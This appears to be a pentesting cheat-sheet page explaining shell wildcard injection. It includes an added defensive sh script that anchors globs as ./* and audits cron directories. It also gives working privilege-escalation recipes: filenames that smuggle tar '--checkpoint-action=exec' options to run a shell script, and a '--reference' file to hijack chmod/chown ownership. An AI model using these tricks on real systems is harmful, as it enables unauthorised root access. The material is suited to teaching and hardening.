Leet Sheet
Wildcard Injection


Last updated 2 years ago


If you have a file named --help in the current directory and you run the command cat *, then instead of the contents of the --help file, the cat command's help page will be printed. This is because bash expands the asterisk into the filename --help before cat ever runs, so cat only receives an argument that looks like a flag and has no way of knowing it was meant to be a file.

For programs which are run by a privileged user with an asterisk, and which have flags with dangerous side effects, this can lead to privesc (for example chown and tar). This vulnerability is often found in automatic cronjobs run by the admin.

Note: The above-described vulnerability wouldn't work if the command was cat somedirectory/*, because it would expand to cat somedirectory/--help. Naming the file " --help" (with a space in front of the dashes) won't help, either.
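
Because the expansion happens in the shell, the defender-side fix is to make sure no expanded name can ever start with a dash: anchor the glob as ./* (or end option parsing with -- where the tool supports it). The POSIX sh script below is an added example, not from the original page: it contrasts an unanchored * with ./* on a constructed directory and includes a small audit helper for cron targets. The function names first_unsafe_arg, first_safe_arg, has_option_like_names and make_demo_dir are chosen here.

```shell
#!/bin/sh
# Added example (not from the original page). A glob expands before the command
# runs, so a filename beginning with "-" becomes an argument the command parses
# as an option. Anchoring the glob as "./*" makes every expansion start with "./".
#
#   vulnerable cron line:  cd /var/backups && tar czf /tmp/b.tgz *
#   hardened cron line:    cd /var/backups && tar czf /tmp/b.tgz ./*

# First argument a command would receive from an unanchored "*" in directory $1.
first_unsafe_arg() {
    ( cd "$1" && set -- * && printf '%s\n' "$1" )
}

# Same directory, glob anchored as "./*": the argument can no longer look like a flag.
first_safe_arg() {
    ( cd "$1" && set -- ./* && printf '%s\n' "$1" )
}

# Audit helper for directories a privileged cron job globs over: exit 0 if any
# entry name starts with "-", which is the signature of a planted option-like file.
has_option_like_names() {
    for f in "$1"/*; do
        [ -e "$f" ] || continue
        case ${f##*/} in
            -*) return 0 ;;
        esac
    done
    return 1
}

# Constructed sample directory: one legitimate file plus one option-looking name.
make_demo_dir() {
    d=$(mktemp -d) || return 1
    touch "$d/notes.txt" "$d/--help"
    printf '%s\n' "$d"
}
```

Run has_option_like_names against each directory a root cron job globs over; a hit is worth an alert, since ordinary users rarely create files whose names begin with a dash.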

Tar RCE

Write the following files to the directory where tar * is run:

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

Chmod/chown Privilege Hijack

Add a file with the following filename to the directory where chmod or chown is run with an asterisk:

--reference=FILE_YOU_OWN

When the chmod or chown command is run, all the files will be changed to have the same permissions/owner as FILE_YOU_OWN. You will have to create a file named FILE_YOU_OWN, obviously.

PS! You can use symlinks to change ownership of external files as well.

Further reading: Exploiting Wildcard for Privilege Escalation - Hacking Articles